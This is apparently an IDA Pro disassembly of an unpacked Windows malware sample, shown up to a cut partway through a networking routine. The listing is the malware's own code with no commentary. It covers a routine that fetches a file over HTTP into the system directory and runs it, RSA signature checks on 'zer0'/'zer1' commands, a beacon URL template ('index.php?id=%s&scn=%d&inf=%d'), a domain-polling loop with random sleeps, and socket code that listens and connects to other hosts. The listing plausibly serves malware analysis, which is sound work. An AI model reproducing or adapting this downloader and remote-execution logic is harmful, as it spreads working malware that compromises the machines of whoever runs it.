; ; +-------------------------------------------------------------------------+ ; | This file is generated by The Interactive Disassembler (IDA) | ; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> | ; | Licensed to: SRI, 1 computer, std, 05/2007 | ; +-------------------------------------------------------------------------+ ; ; ; +-------------------------------------------------------------------------+ ; | This file is generated by The Interactive Disassembler (IDA) | ; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> | ; | Licensed to: SRI, 1 computer, std, 05/2007 | ; +-------------------------------------------------------------------------+ ; ; Input MD5 : DB557D85078147B42E8A3BADF60C9EDE ; File Name : u:\work\db557d85078147b42e8a3badf60c9ede_unpacked.exe ; Format : Portable executable for 80386 (PE) ; Imagebase : 31430000 ; Section 1. (virtual address 00001000) ; Virtual size : 00005000 ( 20480.) ; Section size in file : 00005000 ( 20480.) ; Offset to raw data for section: 00001000 ; Flags E0000080: Bss Executable Readable Writable ; Alignment : default unicode macro page,string,zero irpc c,<string> db '&c', page endm ifnb <zero> dw zero endif endm .686p .mmx .model flat ; =========================================================================== ; Segment type: Pure code ; Segment permissions: Read/Write/Execute UPX0 segment para public 'CODE' use32 assume cs:UPX0 ;org 31431000h assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing dword_31431000 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_31431004 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_31431008 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_3143100C dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_31432A49+1Dr dword_31431010 dd 77DDEDE5h ; resolved to->ADVAPI32.RegDeleteValueAdword_31431014 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_31432A49+4Er ... dword_31431018 dd 77E34D78h ; resolved to->ADVAPI32.AbortSystemShutdownAdword_3143101C dd 77DEA2F9h ; resolved to->ADVAPI32.CryptCreateHashdword_31431020 dd 77DEA122h ; resolved to->ADVAPI32.CryptHashDatadword_31431024 dd 77DEAB80h ; resolved to->ADVAPI32.CryptVerifySignatureAdword_31431028 dd 77DEA254h ; resolved to->ADVAPI32.CryptDestroyHashdword_3143102C dd 77DEA544h ; resolved to->ADVAPI32.CryptDestroyKeydword_31431030 dd 77DE8546h ; resolved to->ADVAPI32.CryptReleaseContextdword_31431034 dd 77DE7F96h ; resolved to->ADVAPI32.CryptAcquireContextAdword_31431038 dd 77DEA879h ; resolved to->ADVAPI32.CryptImportKey align 10h dword_31431040 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_31431044 dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_31431048 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_3143104C dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiAdword_31431050 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_31431054 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_31431058 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshotdword_3143105C dd 7C863DE5h ; resolved to->KERNEL32.Process32Firstdword_31431060 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_31431064 dd 7C863F58h ; resolved to->KERNEL32.Process32Nextdword_31431068 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_31432D2E+8Fr dword_3143106C dd 7C8308ADh ; resolved to->KERNEL32.CreateEventAdword_31431070 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObjectdword_31431074 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_31432C62+Fr dword_31431078 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Errordword_3143107C dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_31431080 dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_314311A0+F6r ... dword_31431084 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_3143237F+57r dword_31431088 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_3143141F+64r ... dword_3143108C dd 7C834D41h ; resolved to->KERNEL32.lstrcatA ; sub_31432C62+40r dword_31431090 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_31432C62+1Br dword_31431094 dd 7C80978Eh ; resolved to->KERNEL32.InterlockedExchange ; sub_3143185D+1r dword_31431098 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoAdword_3143109C dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_314319BC+16Cr ... dword_314310A0 dd 7C810111h ; resolved to->KERNEL32.lstrcpynAdword_314310A4 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_314310A8 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_31431FAB+2Cr dword_314310AC dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_3143256D+124r dword_314310B0 dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemorydword_314310B4 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_31432AF5+92r dword_314310B8 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; UPX0:314324F1r dword_314310BC dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_314310C0 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_314310C4 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_3143210D+12r dword_314310C8 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_314310CC dd 7C80A017h ; resolved to->KERNEL32.SetEventdword_314310D0 dd 7C81320Ch ; resolved to->KERNEL32.OpenEventAdword_314310D4 dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; sub_3143237F+66r ... dword_314310D8 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_3143278A+3Er ... dword_314310DC dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_314310E0 dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_314310E4 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_31432C62+C3r dd 0 dword_314310EC dd 77C371BCh ; resolved to->MSVCRT.sranddword_314310F0 dd 77C46F70h ; resolved to->MSVCRT.memcpydword_314310F4 dd 77C478A0h ; resolved to->MSVCRT.strlendword_314310F8 dd 77C475F0h ; resolved to->MSVCRT.memsetdword_314310FC dd 77C371D3h ; resolved to->MSVCRT.rand ; sub_3143212E:loc_3143213Fr ... ; --------------------------------------------------------------------------- loc_31431100: ; DATA XREF: UPX0:loc_31432EA0r xchg eax, esp pop esp retn ; --------------------------------------------------------------------------- db 77h dword_31431104 dd 77C47C60h ; resolved to->MSVCRT.strstr ; sub_3143141F+1A0r ... dword_31431108 dd 77C1BF18h ; resolved to->MSVCRT.atoidword_3143110C dd 77C47660h ; resolved to->MSVCRT.strchr ; sub_3143141F+B4r dd 0 dword_31431114 dd 7E42DE87h ; resolved to->USER32.FindWindowAdword_31431118 dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindowdword_3143111C dd 7E418A80h ; resolved to->USER32.GetWindowThreadProcessIddword_31431120 dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_31431782+5Dr ... align 8 dword_31431128 dd 42C30BFAh ; resolved to->WININET.InternetOpenUrlA ; sub_31431782+9Dr dword_3143112C dd 42C2C8A1h ; resolved to->WININET.InternetOpenA ; sub_31431782+89r dword_31431130 dd 42C1DAC1h ; resolved to->WININET.InternetCloseHandledword_31431134 dd 42C367F6h ; resolved to->WININET.InternetGetConnectedState ; UPX0:31432967r dword_31431138 dd 42C2ABF4h ; resolved to->WININET.InternetReadFile ; sub_31431782+B0r align 10h dword_31431140 dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_31431144 dd 71AB3E00h ; resolved to->WS2_32.binddword_31431148 dd 71AB88D3h ; resolved to->WS2_32.listendword_3143114C dd 71AC1028h ; resolved to->WS2_32.acceptdword_31431150 dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_31431154 dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastErrordword_31431158 dd 71AB4FD4h ; resolved to->WS2_32.gethostbynamedword_3143115C dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_3143237F+ACr dword_31431160 dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_314328D7+Dr dword_31431164 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_3143237F+F0r dword_31431168 dd 71AB406Ah ; resolved to->WS2_32.connectdword_3143116C dd 71AB428Ah ; resolved to->WS2_32.send ; sub_31432239+67r ... dword_31431170 dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_314319BC+1D8r ... dword_31431174 dd 71AC0BDEh ; resolved to->WS2_32.shutdown ; sub_31432239+128r dword_31431178 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_31432239+12Fr align 10h dword_31431180 dd 0FFFFFFFFh, 0 dd offset nullsub_1 align 10h dword_31431190 dd 0FFFFFFFFh, 0 dd offset nullsub_2 align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_314311A0 proc near ; CODE XREF: sub_3143141F+172p var_110 = byte ptr -110h var_C = byte ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 110h push ebx push esi xor esi, esi push edi push esi push esi push esi push 1 push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"... call dword_3143112C ; InternetOpenA mov ebx, eax cmp ebx, esi jnz short loc_314311CB push 1 jmp loc_31431261 ; --------------------------------------------------------------------------- loc_314311CB: ; CODE XREF: sub_314311A0+22j lea eax, [ebp+var_110] push 104h push eax call dword_31431090 ; GetSystemDirectoryA mov edi, dword_3143108C lea eax, [ebp+var_110] push offset dword_314341F8 push eax call edi ; lstrcatA lea eax, [ebp+var_110] push 6 push eax call dword_31431088 ; lstrlenA lea eax, [ebp+eax+var_110] push eax call sub_3143212E pop ecx lea eax, [ebp+var_110] pop ecx push offset dword_314341F0 push eax call edi ; lstrcatA push esi push esi push 2 push esi push esi lea eax, [ebp+var_110] push 40000000h push eax call dword_31431084 ; CreateFileA cmp eax, 0FFFFFFFFh mov [ebp+var_4], eax jnz short loc_31431241 push 2 jmp short loc_31431261 ; --------------------------------------------------------------------------- loc_31431241: ; CODE XREF: sub_314311A0+9Bj push esi push esi push esi push esi push [ebp+arg_0] push ebx call dword_31431128 ; InternetOpenUrlA cmp eax, esi mov [ebp+arg_0], eax jnz short loc_31431264 push [ebp+var_4] call dword_31431080 ; CloseHandle push 3 loc_31431261: ; CODE XREF: sub_314311A0+26j ; sub_314311A0+9Fj pop eax jmp short loc_314312B5 ; --------------------------------------------------------------------------- loc_31431264: ; CODE XREF: sub_314311A0+B4j mov edi, 100000h push edi call sub_31432E6C mov ebx, eax pop ecx lea eax, [ebp+var_8] push eax push edi push ebx push [ebp+arg_0] call dword_31431138 ; InternetReadFile lea eax, [ebp+var_C] push esi push eax push [ebp+var_8] push ebx push [ebp+var_4] call dword_3143107C ; WriteFile push [ebp+var_4] call dword_31431080 ; CloseHandle lea eax, [ebp+var_110] push 5 push eax call sub_3143215E push ebx call sub_31432E80 add esp, 0Ch xor eax, eax loc_314312B5: ; CODE XREF: sub_314311A0+C2j pop edi pop esi pop ebx leave retn sub_314311A0 endp ; =============== S U B R O U T I N E ======================================= sub_314312BA proc near ; CODE XREF: sub_3143141F+103p ; sub_3143141F+1DEp ... arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = dword ptr 0Ch cmp [esp+arg_8], 0 jle short locret_31431312 mov ecx, [esp+arg_4] mov eax, [esp+arg_0] push ebx push esi push edi or edi, 0FFFFFFFFh inc eax push 0Fh lea esi, [ecx+1] sub edi, ecx pop ecx loc_314312D8: ; CODE XREF: sub_314312BA+53j mov dl, [eax] mov bl, [eax-1] add edx, ecx add bl, cl sar edx, 4 and dl, 3 shl bl, 2 or dl, bl mov [esi-1], dl mov dl, [eax+1] mov bl, [eax] dec dl add bl, cl and dl, cl shl bl, 4 xor dl, bl add eax, 3 mov [esi], dl inc esi inc esi lea edx, [edi+esi] cmp edx, [esp+0Ch+arg_8] jl short loc_314312D8 pop edi pop esi pop ebx locret_31431312: ; CODE XREF: sub_314312BA+5j retn sub_314312BA endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31431313 proc near ; CODE XREF: sub_31431398+27p var_38 = byte ptr -38h var_1C = byte ptr -1Ch arg_0 = byte ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 38h push ebx push esi push edi push 6 pop ecx mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ" lea edi, [ebp+var_1C] push 6 rep movsd movsw movsb pop ecx mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz" lea edi, [ebp+var_38] mov ebx, [ebp+arg_4] rep movsd movsw test ebx, ebx movsb jge short loc_31431346 add ebx, 1Ah loc_31431346: ; CODE XREF: sub_31431313+2Ej movsx edi, [ebp+arg_0] mov esi, dword_3143110C lea eax, [ebp+var_1C] push edi push eax call esi ; strchr pop ecx test eax, eax pop ecx jz short loc_31431370 lea ecx, [ebp+var_1C] push 1Ah sub eax, ecx pop ecx add eax, ebx cdq idiv ecx mov al, [ebp+edx+var_1C] jmp short loc_31431393 ; --------------------------------------------------------------------------- loc_31431370: ; CODE XREF: sub_31431313+48j lea eax, [ebp+var_38] push edi push eax call esi ; strchr pop ecx test eax, eax pop ecx jz short loc_31431390 lea ecx, [ebp+var_38] push 1Ah sub eax, ecx pop ecx add eax, ebx cdq idiv ecx mov al, [ebp+edx+var_38] jmp short loc_31431393 ; --------------------------------------------------------------------------- loc_31431390: ; CODE XREF: sub_31431313+68j mov al, [ebp+arg_0] loc_31431393: ; CODE XREF: sub_31431313+5Bj ; sub_31431313+7Bj pop edi pop esi pop ebx leave retn sub_31431313 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31431398 proc near ; CODE XREF: sub_3143141F+E0p arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp mov eax, [ebp+arg_4] push esi mov esi, [ebp+arg_8] push edi mov al, [eax] test al, al jz short loc_314313F5 mov edi, [ebp+arg_0] push ebx loc_314313AD: ; CODE XREF: sub_31431398+58j sub al, 2 inc [ebp+arg_4] mov bl, al mov eax, esi neg eax mov byte ptr [ebp+arg_0], bl push eax push [ebp+arg_0] call sub_31431313 mov [edi], al pop ecx inc edi cmp bl, 61h pop ecx jl short loc_314313D9 cmp bl, 7Ah jg short loc_314313D9 movsx esi, bl sub esi, 61h loc_314313D9: ; CODE XREF: sub_31431398+34j ; sub_31431398+39j cmp bl, 41h jl short loc_314313E9 cmp bl, 5Ah jg short loc_314313E9 movsx esi, bl sub esi, 41h loc_314313E9: ; CODE XREF: sub_31431398+44j ; sub_31431398+49j mov eax, [ebp+arg_4] mov al, [eax] test al, al jnz short loc_314313AD pop ebx jmp short loc_314313F8 ; --------------------------------------------------------------------------- loc_314313F5: ; CODE XREF: sub_31431398+Fj mov edi, [ebp+arg_0] loc_314313F8: ; CODE XREF: sub_31431398+5Bj and byte ptr [edi], 0 pop edi pop esi pop ebp retn sub_31431398 endp ; =============== S U B R O U T I N E ======================================= sub_314313FF proc near ; CODE XREF: sub_3143141F+10Fp ; sub_3143141F+1FCp arg_0 = dword ptr 4 xor eax, eax xor ecx, ecx loc_31431403: ; CODE XREF: sub_314313FF+12j mov edx, [esp+arg_0] movzx edx, byte ptr [ecx+edx] add eax, edx inc ecx cmp ecx, 30h jl short loc_31431403 push 1Ah cdq pop ecx idiv ecx mov eax, edx add eax, 61h retn sub_314313FF endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_3143141F proc near ; CODE XREF: sub_31431782+BAp var_1EC = dword ptr -1ECh var_1E8 = byte ptr -1E8h var_1CC = byte ptr -1CCh var_1B8 = dword ptr -1B8h var_1B4 = byte ptr -1B4h var_184 = dword ptr -184h var_180 = dword ptr -180h var_17C = dword ptr -17Ch var_178 = byte ptr -178h var_174 = byte ptr -174h var_16C = byte ptr -16Ch var_168 = byte ptr -168h var_138 = dword ptr -138h var_134 = dword ptr -134h var_130 = dword ptr -130h var_12C = dword ptr -12Ch var_128 = byte ptr -128h var_120 = byte ptr -120h var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_10 = dword ptr -10h var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp push 0FFFFFFFFh push offset dword_31431180 push offset loc_31432EA0 mov eax, large fs:0 push eax mov large fs:0, esp sub esp, 1DCh push ebx push esi push edi mov [ebp+var_12C], 1 and [ebp+var_4], 0 push offset aZer0 ; "zer0" push [ebp+arg_0] call dword_31431104 ; strstr pop ecx pop ecx mov esi, eax mov [ebp+var_134], esi test esi, esi jz loc_314315B7 add esi, 4 mov [ebp+var_134], esi jz loc_314315B7 push esi call dword_31431088 ; lstrlenA mov [ebp+var_20], eax cmp eax, 50h jle loc_314315B7 lea eax, [esi+100h] mov cl, [eax] mov [ebp+var_174], cl and byte ptr [eax], 0 mov al, [esi] mov [ebp+var_16C], al movsx ebx, al sub ebx, 61h mov [ebp+var_130], ebx js loc_314315AB cmp ebx, 1Ah jge loc_314315AB inc esi mov [ebp+var_134], esi push 7Eh push esi call dword_3143110C ; strchr pop ecx pop ecx mov edi, eax mov [ebp+var_138], edi test edi, edi jz loc_314315AB mov al, [edi] mov [ebp+var_178], al and byte ptr [edi], 0 push ebx push esi lea eax, [ebp+var_120] push eax call sub_31431398 mov al, [ebp+var_178] mov [edi], al lea esi, [edi+1] mov [ebp+var_134], esi push 30h lea eax, [ebp+var_168] push eax lea eax, [esi+1] push eax call sub_314312BA lea eax, [ebp+var_168] push eax call sub_314313FF add esp, 1Ch cmp [esi], al jnz short loc_314315AB push 44h push offset dword_31434000 lea eax, [ebp+var_128] push eax call sub_314318EA add esp, 0Ch lea eax, [ebp+var_1C] push eax push 30h lea eax, [ebp+var_168] push eax lea eax, [ebp+var_120] push eax call dword_31431088 ; lstrlenA push eax lea eax, [ebp+var_120] push eax lea eax, [ebp+var_128] push eax call sub_31431955 add esp, 18h test eax, eax jnz short loc_3143159E cmp [ebp+var_1C], eax jz short loc_3143159E lea eax, [ebp+var_120] push eax call sub_314311A0 pop ecx and [ebp+var_12C], 0 loc_3143159E: ; CODE XREF: sub_3143141F+164j ; sub_3143141F+169j lea eax, [ebp+var_128] push eax call sub_31431939 pop ecx loc_314315AB: ; CODE XREF: sub_3143141F+9Bj ; sub_3143141F+A4j ... mov al, [ebp+var_174] mov [esi+100h], al loc_314315B7: ; CODE XREF: sub_3143141F+4Ej ; sub_3143141F+5Dj ... push offset aZer1 ; "zer1" push [ebp+arg_0] call dword_31431104 ; strstr pop ecx pop ecx mov esi, eax mov [ebp+var_134], esi test esi, esi jz loc_31431763 add esi, 4 mov [ebp+var_134], esi push esi call dword_31431088 ; lstrlenA mov [ebp+var_20], eax cmp eax, 5Ah jle loc_31431763 push 0Ch lea eax, [ebp+var_184] push eax push esi call sub_314312BA push 30h lea eax, [ebp+var_1B4] push eax lea eax, [esi+13h] push eax call sub_314312BA lea eax, [ebp+var_1B4] push eax call sub_314313FF add esp, 1Ch cmp [esi+12h], al jnz loc_31431763 push 44h push offset dword_31434000 lea eax, [ebp+var_128] push eax call sub_314318EA lea eax, [ebp+var_1C] push eax push 30h lea eax, [ebp+var_1B4] push eax push 0Ch lea eax, [ebp+var_184] push eax lea eax, [ebp+var_128] push eax call sub_31431955 add esp, 24h test eax, eax jnz loc_31431756 cmp [ebp+var_1C], eax jz loc_31431756 push 7 pop ecx mov esi, offset aSoftwareMicros ; "Software\\Microsoft\\Wireless" lea edi, [ebp+var_1E8] rep movsd mov eax, dword_3143426C mov [ebp+var_1B8], eax push 13h lea eax, [ebp+var_1CC] push eax lea eax, [ebp+var_1B8] push eax lea eax, [ebp+var_1E8] push eax mov esi, 80000002h push esi call sub_31432A49 add esp, 14h test eax, eax jnz short loc_314316CF lea eax, [ebp+var_1CC] push eax call dword_31431108 ; atoi pop ecx mov [ebp+var_1EC], eax jmp short loc_314316D6 ; --------------------------------------------------------------------------- loc_314316CF: ; CODE XREF: sub_3143141F+298j and [ebp+var_1EC], 0 loc_314316D6: ; CODE XREF: sub_3143141F+2AEj mov eax, [ebp+var_184] cmp [ebp+var_1EC], eax jnb short loc_3143174F mov [ebp+var_1EC], eax push eax push offset aD ; "%d" lea eax, [ebp+var_1CC] push eax call dword_31431120 ; wsprintfA add esp, 0Ch lea eax, [ebp+var_1CC] push eax call dword_31431088 ; lstrlenA inc eax push eax lea eax, [ebp+var_1CC] push eax lea eax, [ebp+var_1B8] push eax lea eax, [ebp+var_1E8] push eax push esi call sub_31432AA2 add esp, 14h cmp dword_31435048, 0 jnz short loc_3143173E push [ebp+var_180] jmp short loc_31431744 ; --------------------------------------------------------------------------- loc_3143173E: ; CODE XREF: sub_3143141F+315j push [ebp+var_17C] loc_31431744: ; CODE XREF: sub_3143141F+31Dj push offset dword_3143504C call dword_31431094 ; InterlockedExchange loc_3143174F: ; CODE XREF: sub_3143141F+2C3j and [ebp+var_12C], 0 loc_31431756: ; CODE XREF: sub_3143141F+247j ; sub_3143141F+250j lea eax, [ebp+var_128] push eax call sub_31431939 pop ecx loc_31431763: ; CODE XREF: sub_3143141F+1B2j ; sub_3143141F+1CEj ... or [ebp+var_4], 0FFFFFFFFh call nullsub_1 mov eax, [ebp+var_12C] mov ecx, [ebp+var_10] mov large fs:0, ecx pop edi pop esi pop ebx leave retn sub_3143141F endp ; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND] ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31431782 proc near ; CODE XREF: sub_3143185D+2Ap var_E8 = byte ptr -0E8h var_84 = byte ptr -84h var_4 = byte ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 0E8h push ebx push esi push edi push 4000h call sub_31432E6C pop ecx mov esi, eax lea eax, [ebp+var_E8] push 63h push eax push 7 push 400h call dword_31431098 ; GetLocaleInfoA xor ebx, ebx cmp byte ptr [ebp+arg_4], bl jz short loc_314317EA lea eax, [ebp+var_E8] push eax lea eax, [ebp+var_84] push dword_3143502C push dword_31435044 push offset aBbdenbucqfywfv ; "bbdenbucqfywfvz" push [ebp+arg_0] push offset aHttpSIndex_php ; "http://%s/index.php?id=%s&scn=%d&inf=%d"... push eax call dword_31431120 ; wsprintfA add esp, 1Ch jmp short loc_31431802 ; --------------------------------------------------------------------------- loc_314317EA: ; CODE XREF: sub_31431782+34j push [ebp+arg_0] lea eax, [ebp+var_84] push offset aHttpS ; "http://%s" push eax call dword_31431120 ; wsprintfA add esp, 0Ch loc_31431802: ; CODE XREF: sub_31431782+66j push ebx push ebx push ebx push ebx push offset aMozilla4_0Co_0 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"... call dword_3143112C ; InternetOpenA push ebx mov edi, eax push ebx push ebx lea eax, [ebp+var_84] push ebx push eax push edi call dword_31431128 ; InternetOpenUrlA mov ebx, eax lea eax, [ebp+var_4] push eax push 2000h push esi push ebx call dword_31431138 ; InternetReadFile push esi mov [ebp+arg_4], eax call sub_3143141F push esi call sub_31432E80 mov esi, dword_31431130 pop ecx pop ecx push ebx call esi ; InternetCloseHandle push edi call esi ; InternetCloseHandle mov eax, [ebp+arg_4] pop edi pop esi pop ebx leave retn sub_31431782 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: noreturn sub_3143185D proc near ; DATA XREF: sub_3143256D+169o push ebx mov ebx, dword_31431094 push esi push edi loc_31431866: ; CODE XREF: sub_3143185D+88j xor esi, esi mov edi, 46021h loc_3143186D: ; CODE XREF: sub_3143185D+86j inc esi inc esi call sub_314321F3 test eax, eax jz short loc_314318B7 mov al, byte_31434080[esi+esi*4] push eax push off_31434081[esi+esi*4] call sub_31431782 or eax, edi pop ecx xor eax, 8064h pop ecx shl eax, 3 mov edi, eax xor eax, 228h test ax, 0FFFFh jnz short loc_314318B7 push 0 push offset dword_31435044 call ebx ; InterlockedExchange push 0 push offset dword_3143502C call ebx ; InterlockedExchange loc_314318B7: ; CODE XREF: sub_3143185D+19j ; sub_3143185D+46j call dword_314310FC ; rand push 3 cdq pop ecx idiv ecx add esi, edx call sub_31432223 xor edx, edx mov ecx, 493E0h div ecx add edx, 61B48h push edx call dword_3143109C ; Sleep cmp esi, 16h jb short loc_3143186D jmp loc_31431866 sub_3143185D endp ; =============== S U B R O U T I N E ======================================= sub_314318EA proc near ; CODE XREF: sub_3143141F+129p ; sub_3143141F+21Bp arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = dword ptr 0Ch push ebx mov ebx, [esp+4+arg_0] push esi mov esi, dword_31431034 push edi xor edi, edi push edi push 1 push edi push edi push ebx call esi ; CryptAcquireContextA test eax, eax jnz short loc_31431917 push 8 push 1 push edi push edi push ebx call esi ; CryptAcquireContextA test eax, eax jnz short loc_31431917 push 1 pop eax jmp short loc_31431935 ; --------------------------------------------------------------------------- loc_31431917: ; CODE XREF: sub_314318EA+19j ; sub_314318EA+26j lea eax, [ebx+4] push eax push edi push edi push [esp+18h+arg_8] push [esp+1Ch+arg_4] push dword ptr [ebx] call dword_31431038 ; CryptImportKey neg eax sbb eax, eax and al, 0FEh inc eax inc eax loc_31431935: ; CODE XREF: sub_314318EA+2Bj pop edi pop esi pop ebx retn sub_314318EA endp ; =============== S U B R O U T I N E ======================================= sub_31431939 proc near ; CODE XREF: sub_3143141F+186p ; sub_3143141F+33Ep arg_0 = dword ptr 4 push esi mov esi, [esp+4+arg_0] push dword ptr [esi+4] call dword_3143102C ; CryptDestroyKey push 0 push dword ptr [esi] call dword_31431030 ; CryptReleaseContext xor eax, eax pop esi retn sub_31431939 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31431955 proc near ; CODE XREF: sub_3143141F+15Ap ; sub_3143141F+23Dp arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h arg_14 = dword ptr 1Ch push ebp mov ebp, esp push esi mov esi, [ebp+arg_0] push edi lea eax, [ebp+arg_0] xor edi, edi push eax push edi push edi push 8003h push dword ptr [esi] call dword_3143101C ; CryptCreateHash test eax, eax jnz short loc_3143197B push 1 pop eax jmp short loc_314319B8 ; --------------------------------------------------------------------------- loc_3143197B: ; CODE XREF: sub_31431955+1Fj push edi push [ebp+arg_8] push [ebp+arg_4] push [ebp+arg_0] call dword_31431020 ; CryptHashData test eax, eax jnz short loc_31431994 push 2 pop edi jmp short loc_314319AD ; --------------------------------------------------------------------------- loc_31431994: ; CODE XREF: sub_31431955+38j push edi push edi push dword ptr [esi+4] push [ebp+arg_10] push [ebp+arg_C] push [ebp+arg_0] call dword_31431024 ; CryptVerifySignatureA mov ecx, [ebp+arg_14] mov [ecx], eax loc_314319AD: ; CODE XREF: sub_31431955+3Dj push [ebp+arg_0] call dword_31431028 ; CryptDestroyHash mov eax, edi loc_314319B8: ; CODE XREF: sub_31431955+24j pop edi pop esi pop ebp retn sub_31431955 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_314319BC proc near ; CODE XREF: sub_31432728+35p ; sub_3143278A+47p ... var_89E4 = byte ptr -89E4h var_897C = byte ptr -897Ch var_690C = byte ptr -690Ch var_689C = byte ptr -689Ch var_5DD8 = byte ptr -5DD8h var_4834 = byte ptr -4834h var_4833 = byte ptr -4833h var_37A0 = byte ptr -37A0h var_2CDC = byte ptr -2CDCh var_2CDB = byte ptr -2CDBh var_2CD8 = byte ptr -2CD8h var_24F4 = byte ptr -24F4h var_24E4 = byte ptr -24E4h var_21C0 = byte ptr -21C0h var_21BC = byte ptr -21BCh var_21B0 = byte ptr -21B0h var_1F28 = byte ptr -1F28h var_1EAC = byte ptr -1EACh var_16DC = byte ptr -16DCh var_1231 = byte ptr -1231h var_F44 = byte ptr -0F44h var_EA4 = byte ptr -0EA4h var_798 = dword ptr -798h var_788 = byte ptr -788h var_774 = byte ptr -774h var_730 = byte ptr -730h var_134 = byte ptr -134h var_133 = byte ptr -133h var_E4 = byte ptr -0E4h var_E1 = byte ptr -0E1h var_B7 = byte ptr -0B7h var_B5 = byte ptr -0B5h var_B4 = byte ptr -0B4h var_6C = byte ptr -6Ch var_4C = byte ptr -4Ch var_24 = word ptr -24h var_22 = word ptr -22h var_20 = dword ptr -20h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_6 = byte ptr -6 var_5 = byte ptr -5 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp mov eax, 89E4h call sub_31432EC0 mov eax, dword_31434CAC push ebx push edi push 1 pop edi xor ebx, ebx mov [ebp+var_14], eax mov eax, dword_31434CB0 push ebx push edi push 2 mov [ebp+var_10], eax mov [ebp+var_C], edi call dword_3143115C ; socket cmp eax, 0FFFFFFFFh mov [ebp+var_4], eax jz loc_31431F1C push esi mov esi, [ebp+arg_0] push 1Dh push esi call dword_31431160 ; inet_ntoa push eax lea eax, [ebp+var_6C] push eax call dword_314310A0 ; lstrcpynA lea eax, [ebp+var_6C] push eax lea eax, [ebp+var_4C] push offset loc_31434CA0 push eax call dword_31431120 ; wsprintfA add esp, 0Ch xor ecx, ecx lea eax, [ebp+var_133] loc_31431A2F: ; CODE XREF: 